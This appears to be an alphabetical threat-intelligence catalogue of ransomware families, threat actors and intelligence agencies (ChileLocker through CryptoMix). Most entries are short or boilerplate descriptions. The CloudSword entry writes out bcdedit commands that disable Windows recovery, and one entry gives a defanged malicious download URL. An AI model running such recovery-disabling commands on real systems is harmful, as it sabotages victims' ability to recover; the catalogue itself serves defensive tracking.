ChileLocker first emerged in August 2022 and is considered part of the broader ARCrypter ransomware family. It employs a double-extortion model, encrypting Windows and Linux/VMware ESXi systems and threatening data leaks. ChileLocker uses the NTRU public key cryptosystem for encryption and typically appends the .crypt extension to affected files. Following encryption, it drops a ransom note—often named readme_for_unlock.txt—and directs victims to a password-protected Tor negotiation portal, with the password provided in the note. The group also disables recovery mechanisms by deleting shadow copies. Its initial access tactics include exploitation of misconfigured RDP access, phishing, malicious installers, botnets, fake updates, and malvertising. The ransomware has impacted victims across various regions, including Chile, Mexico, Canada, Spain, and others.
ChinaYunLong
Ransomware
Chip Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
chort
Chort is a relatively new data-extortion ransomware group that surfaced in late 2024, with confirmed activity beginning in October–November 2024. It operates under a double-extortion model—exfiltrating sensitive data before encrypting systems—and organizes victims via a Tor-hosted data leak site (DLS). The group has targeted organizations in the U.S. education sector (including schools and nonprofits) and in Kuwait's agriculture sector, among others. Technical behaviors include execution via PowerShell and removal of shadow copies to disrupt recovery. The group's approach emphasizes public pressure through data exposure rather than technical innovation.
Christmas
Ransomware
CHRYSENE
Adversaries abusing ICS (based on Dragos Inc adversary list). This threat actor targets organizations involved in oil, gas, and electricity production, primarily in the Gulf region, for espionage purposes. According to one cybersecurity company, the threat actor “compromises a target machine and passes it off to another threat actor for further exploitation.”
CIA Special Agent 767 Ransomware (FAKE!!!)
It’s directed to English speaking users, therefore is able to infect users all over the world. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… Your files are not really encrypted and nothing actually happens, however the hacker does ask the victim to pay a sum of 100$, after 5 days the sum goes up to 250$ and thereafter to 500$. After the payment is received, the victim gets the following message informing him that he has been fooled and he simply needed to delete the note. https://4.bp.blogspot.com/-T8iSbbGOz84/WFGZEbuRfCI/AAAAAAAACm0/SO8Srwx2UIM3FPZcZl7W76oSDCsnq2vfgCPcB/s1600/code2.jpg
CiberInteligenciaSV
CiberInteligenciaSV is a threat actor that leaked 5.1 million Salvadoran records on Breach Forums. They have also compromised El Salvador's state Bitcoin wallet, Chivo, leaking its source code and VPN credentials. The group aims to obscure their involvement by associating with the Guacamaya group and its proxies.
Cicada3301 Ransomware Group
A suspected ransomware-as-a-service ("RaaS") group first observed in June 2024, which extorts victims via traditional ransomware encryption and by threatening to leak allegedly exfiltrated data onto the web.[[Truesec AB August 30 2024](/references/de2de0a9-17d2-41c2-838b-7850762b80ae)]
cicada3301
Cicada3301 is a sophisticated Ransomware-as-a-Service (RaaS) group that emerged in June 2024. It’s written in Rust and supports cross-platform operations, targeting Windows, Linux, VMware ESXi, NAS, and even PowerPC systems. Technically, its ransomware shares many traits with BlackCat/ALPHV, such as use of ChaCha20 encryption, Rust-based structure, similar configuration interfaces, and methods for shutting down virtual machines and deleting snapshots. Cicada3301 also implements double-extortion tactics—encrypting or exfiltrating data and publishing it on Tor-based leak sites. The group appears to have established an affiliate program, demonstrated through their deployment interfaces and recruitment tactics via forums like RAMP. Operations are believed to be highly professional, possibly involving former ALPHV developers or affiliates.
Ciphbit
CiphBit is a crypto-ransomware first detected in April 2023. It utilizes a double-extortion model, encrypting files and threatening to leak stolen data via a Tor-hosted portal if ransom demands are not met. The malware appends encrypted files with a vector including a unique victim ID, the attacker’s email address (onionmail.org), and a four-character random extension—making file identification and recovery especially difficult. Victims span various sectors including banking, manufacturing, healthcare, logistics, and professional services across North America and Europe. The group is classified as a data broker due to its evolving extortion methods involving free leaks and selective leaks to pressure victims. Recent high-profile victims include iptelecom GmbH (Germany) and Therma Seal Insulation Systems (USA), reaffirming its cross-industry reach and impact.
cipherforce
For those out of the loop, you may already know us as TeamPCP or Shellforce, we have been active a while publishing data and writing malware, CipherForce is a newer project we are starting to find affiliates and are hoping to begin publishing companies soon.
Cipherwolf
Cipherwolf is an active ransomware-as-a-service operation tracked by RansomLook.
CIRCUS SPIDER
According to Crowdstrike, the NetWalker ransomware is being developed and maintained by a Russian-speaking actor designated as CIRCUS SPIDER. Initially discovered in September 2019and havinga compilation timestamp dating back to 28 August 2019, NetWalker has been found to be used in Big Game Hunting (BGH)-style operations while also being distributed via spam. CIRCUS SPIDER is advertising NetWalkeras being a closed-affiliate program,and verifies applicants before they are being accepted as an affiliate. The requirements rangefrom providing proof of previous revenue in similar affiliates programs, experience in the field and what type of industry the applicantis targeting.
CIS Corps (Ireland)
Communications and Information Services Corps (CIS) SIGINT Section
CISMIL
Military Intelligence and Security Service - Centro de Informações e Segurança Militares (CISMIL)
CL-STA-0043
CL-STA-0043 is a highly skilled and sophisticated threat actor, believed to be a nation-state, targeting governmental entities in the Middle East and Africa. They exploit vulnerabilities in on-premises Internet Information Services and Microsoft Exchange servers to infiltrate target networks. They engage in reconnaissance, locate vital assets, and have been observed using native Windows tools for privilege escalation.
CL-STA-0048
CL-STA-0048 is a Chinese state-backed APT that targets strategic sectors in South Asia, particularly government and telecommunications entities, with a focus on espionage. The group has been linked to SAP NetWeaver intrusions and employs techniques such as DNS beaconing using ping commands and exploiting unpatched vulnerabilities in services like IIS, Apache Tomcat, and MSSQL. Analysts have observed its use of reverse shell commands and command-and-control traffic directed to specific IP addresses. The actor adapts its methods to evade detection and maintain persistent access to high-value networks.
CL-STA-1009
CL-STA-1009 is a threat activity cluster associated with a suspected nation-state actor utilizing the Airstalk malware family, which includes both PowerShell and .NET variants. The .NET variant features a multi-threaded C2 protocol, versioning, and complex tasks, employing defense evasion techniques such as signed binaries with a revoked certificate and manipulation of PE timestamps. The malware is believed to have been used in supply chain attacks, with a development timeline established through signed timestamps. The persistent threat posed by this actor is underscored by the adaptive nature of the malware.
CL-STA-1087
CL-STA-1087 is a suspected state-sponsored espionage campaign operating out of China, targeting military organizations in Southeast Asia. The actor has demonstrated operational patience, maintaining dormant access for extended periods while focusing on precision intelligence collection and employing robust operational security measures. Their infrastructure includes the use of a legitimate cloud service for C2 operations, indicating a cloud-native approach. File timestamps and other indicators trace the campaign's activity back to 2020, suggesting a long-running operation.
Cl0p
TA505 is a cyber criminal group that has been active since at least 2014. TA505 is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving Clop. [Proofpoint TA505 Sep 2017](https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter) [Proofpoint TA505 June 2018](https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times) [Proofpoint TA505 Jan 2019](https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505) [NCC Group TA505](https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/) [Korean FSI TA505 2020](https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=)
Clay Typhoon
Microsoft threat actor profile. Origin/Threat: China.
Clay
ransomware
Clearwater
Clearwater is an active extortion or ransomware group tracked by RansomLook.
Clever Kitten
Clever Kitten is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Click Me Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker tries to get the user to play a game and when the user clicks the button, there is no game, just 20 pictures in a .gif below: https://3.bp.blogspot.com/-1zgO3-bBazs/WAkPYqXuayI/AAAAAAAABxI/DO3vycRW-TozneSfRTdeKyXGNEtJSMehgCLcB/s1600/all-images.gif
ClicoCrypter-2
Ransomware
ClicoCrypter
Ransomware
Cloak Su Locker Leak
Cloak Su Locker Leak is an active extortion or ransomware group tracked by RansomLook.
Cloak
Cloak is a cybercriminal ransomware group that first appeared publicly in mid-2023, operating with a double-extortion model. It deploys an ARCrypter variant derived from Babuk, delivered via loaders that terminate security and backup services, delete shadow copies, and install encrypted payloads using algorithms like HC-128 combined with Curve25519 key generation. Victims include entities such as the Virginia Attorney General’s Office, whose IT systems were disrupted and whose data (134 GB) was exfiltrated and listed on Cloak’s Tor leak site. Cloak has been linked to other ARCrypter variants like Good Day, sharing victim portals and infrastructure. Its operations reportedly use initial access brokers, phishing, malvertising, and exploit kits for network infiltration.
Clock
Ransomware Does not encrypt anything
CLOCKWORK SPIDER
Opportunistic actor that installs custom root certificate on victim to support man-in-the-middle network monitoring.
Clop Torrents
Clop Torrents is an active extortion or ransomware group tracked by RansomLook.
Clouded
Ransomware
CloudSorcerer
CloudSorcerer is a sophisticated APT targeting Russian government entities, utilizing cloud infrastructure for stealth monitoring and data exfiltration. The malware leverages APIs and authentication tokens to access cloud resources for command and control, with GitHub serving as its initial C2 server. CloudSorcerer operates as separate modules depending on the process it's running in, executing from a single executable and utilizing complex inter-process communication through Windows pipes. The actor behind CloudSorcerer shows similarities to the CloudWizard APT in modus operandi, but the unique code and functionality suggest it is a new threat actor inspired by previous techniques.
CloudSword Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. Uses the name “Window Update” to confuse its victims. Then imitates the window update process , while turning off the Window Startup Repair and changes the BootStatusPolicy using these commands: bcdedit.exe /set {default} recoveryenabled No bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Cmd Organization
Cmd Organization is an active extortion or ransomware group tracked by RansomLook.
Cmd
Ransomware
CNH
ransomware
Coast Guard Intelligence Directorate (page does not exist)
Coast Guard Intelligence Directorate (law enforcement)
Coast Guard Intelligence
Coast Guard Intelligence (CGI)
COBALT JUNO
COBALT JUNO has operated since at least 2013 and focused on targets located in the Middle East including Iran, Jordan, Egypt & Lebanon. COBALT JUNO custom spyware families SABER1 and SABER2, include surveillance functionality and masquerade as legitimate software utilities such as Adobe Updater, StickyNote and ASKDownloader. CTU researchers assess with moderate confidence that COBALT JUNO operated the ZooPark Android spyware since at least mid-2015. ZooPark was publicly exposed in 2018 in both vendor reporting and a high profile leak of C2 server data. COBALT JUNO is linked to a private security company in Iran and outsources aspects of tool development work to commercial software developers. CTU researchers have observed the group using strategic web compromises to deliver malware. CTU researchers’ discovery of new C2 domains in 2019 suggest the group is still actively performing operations.
COBALT KATANA
COBALT KATANA has been active since at least March 2018, and it focuses many of its operations on organizations based in or associated with Kuwait. The group has targeted government, logistics, and shipping organizations. The threat actors gain initial access to targets using DNS hijacking, strategic web compromise with SMB forced authentication, and password brute force attacks. COBALT KATANA operates a custom platform referred to as the Sakabota Framework, also referred to as Sakabota Core, with a complimentary set of modular backdoors and accessory tools including Gon, Hisoka, Hisoka Netero, Killua, Diezen, and Eye. The group has implemented DNS tunnelling in its malware and malicious scripts and also operates the HyphenShell web shell to strengthen post-intrusion access. CTU researchers assess with moderate confidence that COBALT KATANA operates on behalf of Iran, and elements of its operations such as overlapping infrastructure, use of DNS hijacking, implementation of DNS-based C2 channels in malware and web shell security mechanisms suggest connections to COBALT GYPSY and COBALT EDGEWATER.
Cobalt
A criminal group dubbed Cobalt is behind synchronized ATM heists that saw machines across Europe, CIS countries (including Russia), and Malaysia being raided simultaneously, in the span of a few hours. The group has been active since June 2016, and their latest attacks happened in July and August.
CobraLocker
ransomware
CockBlocker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Code Virus Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Codefinger
Codefinger is a ransomware group that targets Amazon S3 buckets by exploiting AWS’s Server-Side Encryption with Customer Provided Keys to encrypt victim data. They utilize compromised AWS credentials to gain access and demand Bitcoin ransoms for the decryption keys, threatening to delete files if negotiations fail. The group has been observed abusing publicly disclosed AWS keys with permissions to read and write S3 objects, making recovery impossible without their cooperation. Halcyon has documented multiple incidents linked to Codefinger's data extortion campaign against organizations with unsecured infrastructure.
Codemanager
Ransomware
CoderCrypt
ransomware
Coin Locker
Ransomware
Coinbase Cartel
Coinbase Cartel is a ransomware threat actor that emerged in September 2025, focusing on data exfiltration rather than encryption, and has claimed over 60 victims, primarily in the healthcare, technology, and transportation sectors. The group employs TTPs such as social engineering, credential harvesting, and collaboration with Initial Access Brokers to gain initial access. They operate a data leak site where they publish victim names and issue ransom demands, requiring payment via Bitcoin.
CoinVault
Ransomware CryptoGraphic Locker family. Has a GUI. Do not confuse with CrypVault!
Cold River
In short, “Cold River” is a sophisticated threat (actor) that utilizes DNS subdomain hijacking, certificate spoofing, and covert tunneled command and control traffic in combination with complex and convincing lure documents and custom implants.
colossus
Colossus ransomware was first observed in September 2021, when ZeroFox researchers uncovered the variant attacking a U.S.-based automotive group. It employs a double-extortion model, using Themida packing and sandbox evasion to disable defenses and deliver encrypted payloads. Victims are urged to visit a support site—hosted at a domain like colossus.support—to negotiate payment, or face large-scale data dumps and increasing ransom amounts tied to countdown timers. Operators demonstrated familiarity with RaaS playbooks, drawing architectural parallels to groups like EpsilonRed, BlackCocaine, and REvil/Sodinokibi.
ComicForm
ComicForm is an emerging cyber threat actor tracked since at least April 2025, specializing in targeted phishing campaigns against organizations in Eurasian countries including Belarus, Kazakhstan, and Russia, often in sectors like banking, production, and critical infrastructure. The group deploys FormBook infostealer malware via sophisticated loaders: an obfuscated .NET executable unpacks MechMatrix Pro.dll, which decrypts and executes Montero.dll dropper in memory to deliver FormBook, establishing persistence through scheduled tasks and antivirus exclusions while evading detection. Malware binaries uniquely embed Tumblr links to innocuous comic superhero GIFs (e.g., Batman), from which the actor derives its name, alongside phishing lures themed around recruitment, quotes, or production facilities using Russian free email services like Rivet_kz. Active through at least September 2025 with no confirmed overlaps to other actors like pro-Russian SectorJ149 despite concurrent Eurasian operations, ComicForm demonstrates proficiency in commodity malware customization and regional targeting.
Common Raven
Threat actor Common Raven has been actively targeting financial sector institutions, compromising their SWIFT payment infrastructure to send out fraudulent payments.
CommonRansom
A new ransomware called CommonRansom was discovered that has a very bizarre request. In order to decrypt a computer after a payment is made, they require the victim to open up Remote Desktop Services on the affected computer and send them admin credentials in order to decrypt the victim's files.
Communications Security Establishment Canada
Communications Security Establishment (CSE)
Comrade Circle Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Comrade HT
Ransomware
CoNFicker
Ransomware
Confucious
Confucius is an APT organization funded by India. It has been carrying out cyber attacks since 2013. Its main targets are India's neighbouring countries such as Pakistan and China. It has a strong interest in targets in the fields of military, government and energy.
Conquerors Electronic Army
Conquerors Electronic Army operates under the “Wa’d al-Akhira” banner and has claimed multiple attacks against Israeli targets, including civil emergency alerting and healthcare sectors, utilizing rented stresser infrastructure and CheckHost proof-of-disruption links. The group has embedded links to a UK-registered charity in their operations, suggesting a potential disruption attempt rather than solely an information operation. Security company Radware identified Conquerors Electronic Army as one of the primary actors behind a series of DDoS attacks targeting government entities in the Middle East. Their activities indicate a focus on both disruptive and influence operations.
Consciousness
ransomware
ConsoleApplication1 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
contfr
Launched around September 2024, ContFR is a French-speaking RaaS that uses a Tor-hosted platform to provide ransomware embedded in PDF files (targeting both Windows and macOS). The group offers a tiered subscription model—“TEST,” “BASIC,” and “ELITE”—allowing affiliates varying degrees of customization, offline capability, and support based on the package purchased. As of the latest reporting, no victims are publicly listed, though data leak publications likely require a subscription to access. The operation suggests an organized, business‑like structure, distinct from opportunistic one‑off strains.
Conti
Conti is a Russian ransomware-as-a-service operation known for targeting healthcare and critical infrastructure.
Coom
Ransomware
Cooming
previous clearnet domain coomingproject.com
Copy-Paste
The title ‘Copy-paste compromises’ is derived from the actor’s heavy use of tools copied almost identically from open source given by The Australian Government.
CoralRaider
CoralRaider is a financially motivated threat actor of Vietnamese origin, targeting victims in Asian and Southeast Asian countries since at least 2023. They use the RotBot loader family and XClient stealer to steal victim information, with hardcoded Vietnamese words in their payloads. CoralRaider operates from Hanoi, Vietnam, and uses a Telegram bot as a C2 channel for their malicious campaigns. Their activities include system reconnaissance, data exfiltration, and targeting victims in multiple countries in the region.
core
Core ransomware surfaced in early 2025 as a new variant within the broader Makop family. It employs a single-extortion model, focusing on encrypting files and demanding payment, without public data-leak threats. The malware appends the .core extension to encrypted files and is delivered via typical exploit vectors known to RaaS campaigns. Core does not showcase advanced double-extortion tactics seen in other modern strains, but it stands out for its familial lineage and continued evolution from Makop ancestors.
CoronaVirus
A new ransomware called CoronaVirus has been distributed through a fake web site pretending to promote the system optimization software and utilities from WiseCleaner. With the increasing fears and anxiety of the Coronavirus (COVID-19) outbreak, an attacker has started to build a campaign to distribute a malware cocktail consisting of the CoronaVirus Ransomware and the Kpot information-stealing Trojan. This new ransomware was discovered by MalwareHunterTeam and after further digging into the source of the file, we have been able to determine how the threat actor plans on distributing the ransomware and possible clues suggesting that it may actually be a wiper.
CorruptCrypt
Ransomware
Corsair Jackal
Corsair Jackal is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Cosmic Lynx
Cosmic Lynx is a Russia-based BEC cybercriminal organization that has significantly impacted the email threat landscape with sophisticated, high-dollar phishing attacks.
CosmicBeetle
CosmicBeetle is a threat actor known for deploying the ScRansom ransomware, which has replaced its previous variant, Scarab. The actor utilizes a custom toolset called Spacecolon, consisting of ScHackTool, ScInstaller, and ScService, to gain initial access through RDP brute forcing and exploiting vulnerabilities like CVE-2020-1472 and FortiOS SSL-VPN. CosmicBeetle has been observed impersonating the LockBit ransomware gang to leverage its reputation and has shown a tendency to leave artifacts on compromised systems. The group primarily targets SMBs globally, employing techniques such as credential dumping and data destruction.
CostaRicto
CostaRicto is a cyber-espionage threat actor that operates as a mercenary group, offering its services to various clients globally. They use bespoke malware tools and sophisticated techniques like VPN proxy and SSH tunnelling. While their targets are scattered across different regions, there is a concentration in South Asia.
Cotton Sandstorm
Cotton Sandstorm is an Iranian threat actor involved in hack-and-leak operations. They have targeted various organizations, including the French satirical magazine Charlie Hebdo, where they obtained and leaked personal information of over 200,000 customers. The group has been linked to the Iranian government and has been sanctioned by the US Treasury
CoughingDown
CoughingDown is a threat group attributed to various cyber campaigns, including the deployment of the EAGERBEE backdoor, which utilizes service manipulation and privilege escalation techniques. The group has been linked to malware infrastructure that abuses legitimate services like MSDTC, IKEEXT, and SessionEnv to load malicious DLLs, including oci.dll. Analysis of supply-chain attacks, particularly involving Trojanized packages, has revealed similarities between CoughingDown malware and post-compromise tools used in these incidents. Evidence such as consistent service creation and C2 domain overlap further supports the connection between EAGERBEE and CoughingDown.
Council for Intelligence Coordination
Council for Intelligence Coordination
Council of Political and Security Affairs (Saudi Arabia)
Council of Political and Security Affairs (CPSA) – مجلس الشؤون السياسية والأمنية
Counter Terrorism and Intelligence Bureau
Counter Terrorism and Intelligence Bureau (CTIB)
Counter Terrorism and Transnational Crime
Counter Terrorism and Transnational Crime (CTTC)
Counter Terrorism Department (Pakistan)
Counter Terrorism Department (CTD)
Counter Terrorism Group
Counter Terrorism Group (CTG)
Coverton
Ransomware
CovidLock
Mobile ransomware. The Zscaler ThreatLabZ team recently came across a URL named hxxp://coronavirusapp[.]site/mobile.html, which portrays itself as a download site for an Android app that tracks the coronavirus spread across the globe. In reality, the app is Android ransomware, which locks out the victim and asks for ransom to unlock the device. The app portrays itself as a Coronavirus Tracker. As soon as it starts running, it asks the user for several authorizations, including admin rights. In fact, this ransomware does not encrypt nor steal anything and only lock the device with an hard coded code.
Cr1ptT0r
Cr1ptT0r Ransomware Targets NAS Devices with Old Firmware.
Craftul
ransomware
Crazyhunter Team
Crazyhunter Team is an active extortion or ransomware group tracked by RansomLook.
CreamPie Ransomware
Jakub Kroustek found what appears to be an in-dev version of the CreamPie Ransomware. It does not currently display a ransom note, but does encrypt files and appends the .[backdata@cock.li].CreamPie extension to them.
Creeper
Ransomware
Creepy
Ransomware
Crescent Typhoon
Microsoft threat actor profile. Origin/Threat: China.
Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)
Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)
Crime Intelligence (SAPS)
Crime Intelligence Division, South African Police Service
Criminal Intelligence Service Canada
Criminal Intelligence Service Canada (CISC)
Criminal Investigation Department (Bangladesh)
Criminal Investigation Department (CID)
Criminal Investigation Department (Kenya)
Directorate of Criminal Investigation(DCI)
Criminal Investigation Department (Sri Lanka)
Criminal Investigation Department (Sri Lanka)
Criminal Investigations Department
Criminal Investigations Department (CID)
Crimson Collective
The Crimson Collective is a cybercrime group that claimed to have compromised Red Hat's private GitHub repositories in September 2025. The group asserted it had stolen 570GB of data from Red Hat's private GitHub repositories, including 28,000 projects and approximately 800 Customer Engagement Reports (CERs) containing sensitive network data. CERs often contain sensitive information including infrastructure details, configurations, and tokens that attackers could exploit to target customers' networks. The group shared proof of the breach on a Telegram channel, including a full file tree, CER list, and screenshots. The U.S.-based multinational software company confirmed the data breach but did not verify the Crimson Collective's claims. The group also claimed to have gained access to some of Red Hat's client infrastructure and stated they had warned the company but were ignored.
Cripton
Ransomware
Cripton7zp
Ransomware
crosslock
CrossLock ransomware was first observed in April 2023, targeting an IT services firm in Brazil using a double‑extortion approach—encrypting data and threatening to leak it publicly. Written in Go, it uses a hybrid encryption scheme combining ChaCha20 for file encryption with Curve25519 for key protection. Victims see their files renamed with the .crlk extension and ransom notes titled ---CrossLock_readme_To_Decrypt---.txt. The malware includes advanced techniques like Event Tracing for Windows (ETW) bypass and process mimicking (e.g., Cybereason processes) for stealth. It was publicly tracked until July 2023, after which activity (and its leak site) went offline.
Crptxxx Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Uses @enigma0x3's UAC bypass
Cry36
Ransomware
Cry9
Ransomware
Cryaki
Ransomware
Cryakl
ransomware
Crybola
Ransomware
CryBrazil
Mostly Hidden Tear with some codes from Eda2 & seems compiled w/ Italian VS. Maybe related to OpsVenezuela?
CryCipher
Ransomware
CryCryptor
ransomware
CryDroid
ransomware
CryFile
Ransomware
CryForMe
Ransomware
Crying
Ransomware
Crylock
CryLock is a ransomware variant that emerged around April 2020, evolving from the Cryakl (Fantomas) ransomware family. It follows a semi-affiliate model, offering customizable options for partners—such as variable encryption routines, network scanning for lateral movement, shadow copy deletion, and process termination—and flexible delivery methods. During encryption, CryLock renames files to include the developer email, a unique victim ID, and a randomized three-letter extension. Victims typically encounter a countdown timer in a pop-up ransom message that warns about escalating ransom costs and potential loss of decryption capabilities.
CryLocker
Ransomware Identifies victim locations w/Google Maps API
CryMore
Ransomware
crynox
Crynox (sometimes referred to as “Crynox Ransomware”) appears to be a generic file-locker threat that appends .crynox to encrypted files and drops a ransom note (read_it.txt) instructing victims to contact crynoxWARE@proton.me. It seems to use RSA-4096 and AES for encryption and may change desktop wallpaper, but there's no evidence of double-extortion or leak site operation. Distribution methods cited include phishing, pirated software, and malicious websites.
cry0
cry0 is an active extortion or ransomware group tracked by RansomLook.
Cryp70n1c
Ransomware
cryp70n1c0d3
cryp70n1c0d3 is an active extortion or ransomware group tracked by RansomLook.
CrypMIC
Ransomware CryptXXX clone/spinoff
Crypren
Ransomware
crypt ransomware
.crYpt
MD5: 54EFAC23D7B524D56BEDBCE887E11849
Babuk Variant
Crypt0 HT
Ransomware
Crypt0
Ransomware
Crypt0L0cker
Ransomware
Crypt0r
Ransomware
Crypt12
Ransomware
Crypt32
ransomware
Crypt38
Ransomware
Cryptbb
Cryptbb is an active extortion or ransomware group tracked by RansomLook.
CryptConsole 2.0 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
CryptConsole
This ransomware does not actually encrypt your file, but only changes the names of your files, just like Globe Ransomware. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files
Cryptedpay
CryptedPay is a standalone ransomware strain observed around early 2025, that encrypts files using AES-256 and appends the .CRYPTEDPAY extension. Victims receive a ransom note (README.txt), have their desktop wallpaper changed, and are instructed to pay approximately $280 in Monero (XMR). The ransomware imposes a 62-hour deadline, threatening permanent file loss if not paid.
Crypter
Ransomware Does not actually encrypt the files, but simply renames them
CryptFIle2
Ransomware
CryptFuck
Ransomware
CryptGh0st
Ransomware
CryptInfinite
Ransomware
Cryptnet
CryptNet is a newer Ransomware-as-a-Service (RaaS) operation first identified in April 2023. It follows a double-extortion model, performing data exfiltration before encrypting files. Written in .NET and obfuscated with .NET Reactor, CryptNet utilizes AES-256 (CBC) and RSA-2048 encryption. Its codebase shares strong similarities with Chaos and Yashma ransomware families.
Crypto-Blocker
Ransomware
Crypto_Lab
Ransomware
crypto24
aka Public Data Storage
CryptoApp
Ransomware
CryptoBit
Ransomware sekretzbel0ngt0us.KEY - do not confuse with CryptorBit.
CryptoBlock Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is in the amount is 0.3 bitcoins. The ransomware is disguises themselves as Adobe Systems, Incorporated. RaaS
CryptoBoss
Ransomware
CryptoCat
Ransomware
CryptoChameleon
CryptoChameleon is a cybercriminal group known for targeting cryptocurrency exchanges and users to steal digital assets, employing tactics such as VIP spear phishing, SIM swapping, and email hacks. They have leveraged phishing kits, including a notable one associated with LastPass, and utilize infrastructure from bulletproof host NICENIC. The group primarily targets platforms like Coinbase and Ledger, and their attacks are characterized by rapid cash-out efforts following successful breaches. Their operational methods include manually guiding victims through phishing pages to evade detection by automated scanners.
CryptoClone
Ransomware
CryptoDark
Ransomware
CryptoDefense
Ransomware no extension change
CryptoDevil Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
CryptoFinancial
Ransomware
CryptoFortress
Ransomware Mimics Torrentlocker. Encrypts only 50% of each file up to 5 MB
CryptoGod 2017
Ransomware
CryptoGod 2018
Ransomware
CryptoGraphic Locker
Ransomware Has a GUI. Subvariants: CoinVault BitCryptor
.CryptoHasYou.
Ransomware
CryptoHost
Ransomware RAR's victim's files has a GUI
CryptoJacky Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
CryptoJoker
Ransomware
CryptoKill Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The files get encrypted, but the decrypt key is not available. NO POINT OF PAYING THE RANSOM, THE FILES WILL NOT BE RETURNED.
CryptoLite
Ransomware
CryptoLocker 1.0.0
Ransomware
CryptoLocker 5.1
Ransomware
CryptoLocker by NTK Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
CryptoLocker
Ransomware no longer relevant
CryptoLocker3 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Creator is staffttt and the ransom is 0.5 botcoins.
CryptolockerEmulator
Ransomware
CryptoLockerEU 2016
Ransomware
CryptoLuck Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
CryptoManiac
Ransomware
CryptoMeister Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
CryptoMix-0000
Ransomware
CryptoMix-Arena
Ransomware
CryptoMix-Azer
Ransomware
CryptoMix-Backup
Ransomware
CryptoMix-CK
Ransomware
CryptoMix-Coban
Ransomware
CryptoMix-DLL
Ransomware
CryptoMix-Empty
Ransomware
CryptoMix-Error
Ransomware
CryptoMix-Exte
Ransomware
Cryptomix-FILE
Ransomware
CryptoMix-MOLE66
Ransomware
CryptoMix-Noob
Ransomware
CryptoMix-Ogonia
Ransomware
CryptoMix-Pirate
Ransomware
CryptoMix-Revenge
Ransomware
Cryptomix-SERVER
Ransomware
CryptoMix-Shark
Ransomware
CryptoMix-System
Ransomware
CryptoMix-Tastylock
Ransomware
CryptoMix-Test
Ransomware
CryptoMix-Wallet
Ransomware
Cryptomix-WORK
Ransomware
CryptoMix-x1881
Ransomware
CryptoMix-XZZX
Ransomware
CryptoMix-Zayka
Ransomware
CryptoMix
Ransomware
Crypton Ransomware
